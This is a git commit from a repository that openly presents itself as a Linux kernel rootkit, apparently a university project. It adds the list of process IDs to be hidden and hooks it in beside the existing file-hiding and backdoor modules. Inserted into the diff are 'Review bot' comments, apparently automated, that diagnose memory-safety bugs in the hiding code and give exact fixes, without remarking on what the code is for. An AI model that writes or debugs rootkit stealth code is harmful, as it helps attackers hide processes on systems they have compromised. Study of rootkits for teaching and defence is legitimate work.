linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit ac3051356bf62ca2c93930b5667be5fce27b6f0a
parent 48711aa87958834f3f19fe87f98ce6613f81f5ea
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 28 Nov 2020 18:39:56 +0100

adds initial pid hiding code

Diffstat:
Asrc/hidepid.c | 110+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Asrc/hidepid.h | 26++++++++++++++++++++++++++
Msrc/hook.c | 3+++
Msrc/rootkit.h | 1+
4 files changed, 140 insertions(+), 0 deletions(-)

diff --git a/src/hidepid.c b/src/hidepid.c
@@ -0,0 +1,110 @@
+#include <linux/slab.h>
+
+#include "hidepid.h"
+
+static pid_list_t hidden_pids = {
+ .pid = -1,
+ .prev = NULL,
+ .next = NULL,
+ .head = NULL,
+ .tail = NULL
+};
+
+
+void
+hide_pid(pid_t pid)
+{
+ if (list_contains_pid(&hidden_pids, pid))
+ return;
+
+ add_pid_to_list(hidden_pids.tail, pid);
+}
+
+void
+unhide_pid(pid_t pid)
+{
+ remove_pid_from_list(hidden_pids.tail, pid);
+}
+
+void
+clear_hidden_pids(void)
+{
+ pid_list_t_ptr i = hidden_pids.tail;
+ while ((i = remove_pid_from_list(i, i->pid)));
+}
+
+void
+unhide_pids(void)
+{
+ clear_hidden_pids();
+ // TODO: disable pid hiding
+}
+
+
+void
+init_pid_list(void)
+{
+ hidden_pids.head = &hidden_pids;
+ hidden_pids.tail = &hidden_pids;
+}
+
+bool
+list_contains_pid(pid_list_t_ptr list, pid_t pid)
+{
+ return !!find_pid_in_list(list, pid);
+}
+
+pid_list_t_ptr
+find_pid_in_list(pid_list_t_ptr list, pid_t pid)
+{
+ pid_list_t_ptr i;
+ for (i = list; i; i = i->next)
+ if (i->pid == pid)
+ return i;
+
+ for (i = list->prev; i; i = i->prev)
+ if (i->pid == pid)
+ return i;
+
+ return NULL;
+}
+
+pid_list_t_ptr
+add_pid_to_list(pid_list_t_ptr tail, pid_t pid)
+{
+ pid_list_t_ptr node;
+ node = (pid_list_t_ptr)kzalloc(sizeof(pid_list_t), GFP_KERNEL);
+
+ if (node) {
+ node->pid = pid;
+ node->next = NULL;
+ node->prev = tail;
+ tail->next = node;
+ hidden_pids.tail = node;
+ return node;
+ }
+
+ return NULL;
+}
+
+pid_list_t_ptr
+remove_pid_from_list(pid_list_t_ptr list, pid_t pid)
+{
+ pid_list_t_ptr ret = NULL, i = find_pid_in_list(list, pid);
+
+ if (i) {
+ if (i->next)
+ i->next->prev = i->prev;
+ else
+ hidden_pids.head = i->prev;
+
+ if (i->prev) {
+ i->prev->next = i->next;
+ ret = i->prev;
+ }
+
+ kfree(i);
+ }
+
+ return ret;
+}
diff --git a/src/hidepid.h b/src/hidepid.h
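Review bot: `remove_pid_from_list` leaves `hidden_pids.tail` dangling whenever it frees the last node, because the `!i->next` branch writes `hidden_pids.head = i->prev` instead of `hidden_pids.tail = i->prev`, so the next `add_pid_to_list` stores `tail->next = node` into freed memory. The same function will also `kfree` the static sentinel: `clear_hidden_pids` walks `prev` until `remove_pid_from_list(&hidden_pids, -1)` matches the sentinel's `.pid = -1`, and `unhide_pid(-1)` does the same directly. I would change the branch to `hidden_pids.tail = i->prev;` and guard the removal with `if (i && i != &hidden_pids) {`. Separately, `.head`/`.tail` could be set to `&hidden_pids` in the static initializer so a hook that runs before `init_pid_list()` does not dereference a NULL `tail` in `add_pid_to_list`; the structure is also shared global state with no lock, which is worth a comment if hooks may run concurrently.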
@@ -0,0 +1,26 @@
+#ifndef _GROUP7_HIDEPID_H
+#define _GROUP7_HIDEPID_H
+
+#include <linux/types.h>
+
+typedef struct pid_list *pid_list_t_ptr;
+typedef struct pid_list {
+ pid_t pid;
+ pid_list_t_ptr prev;
+ pid_list_t_ptr next;
+ pid_list_t_ptr head;
+ pid_list_t_ptr tail;
+} pid_list_t;
+
+void hide_pid(pid_t);
+void unhide_pid(pid_t);
+void clear_hidden_pids(void);
+void unhide_pids(void);
+
+void init_pid_list(void);
+bool list_contains_pid(pid_list_t_ptr, pid_t);
+pid_list_t_ptr find_pid_in_list(pid_list_t_ptr, pid_t);
+pid_list_t_ptr add_pid_to_list(pid_list_t_ptr, pid_t);
+pid_list_t_ptr remove_pid_from_list(pid_list_t_ptr, pid_t);
+
+#endif//_GROUP7_HIDEPID_H
diff --git a/src/hook.c b/src/hook.c
@@ -10,6 +10,7 @@
#include "rootkit.h"
#include "filehide.h"
#include "backdoor.h"
+#include "hidepid.h"
extern rootkit_t rootkit;
@@ -56,6 +57,8 @@ init_hooks(void) backdoor_read(); else if (rootkit.backdoor == BD_TTY) backdoor_tty(); + + init_pid_list(); } void
diff --git a/src/rootkit.h b/src/rootkit.h
@@ -12,6 +12,7 @@ typedef enum { typedef struct { sc_hook_t hooks[16]; bool hiding_files; + bool hiding_pids; bd_state_t backdoor; } rootkit_t;
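Review bot: `add_pid_to_list` and `remove_pid_from_list` are exported from this header, yet both update the file-scope `hidden_pids` (`hidden_pids.tail = node`, `hidden_pids.head = i->prev`), so their `tail`/`list` parameter only chooses where the walk starts and calling them on any other list would corrupt `hidden_pids`. I would keep only `hide_pid`, `unhide_pid`, `clear_hidden_pids`, `unhide_pids` and `init_pid_list` public and make the remaining four `static` in hidepid.c, or at least state the contract above the prototypes: `/* Internal: operate on the file-scope hidden_pids list; the list argument is only a search start point. */`. The `head` and `tail` members are also only written on the sentinel node, which deserves a comment on the struct so nobody reads them from an ordinary node. Typedef'ing the pointer (`pid_list_t_ptr`) hides the indirection; `struct pid_list *` would match the kernel style the rest of the tree follows.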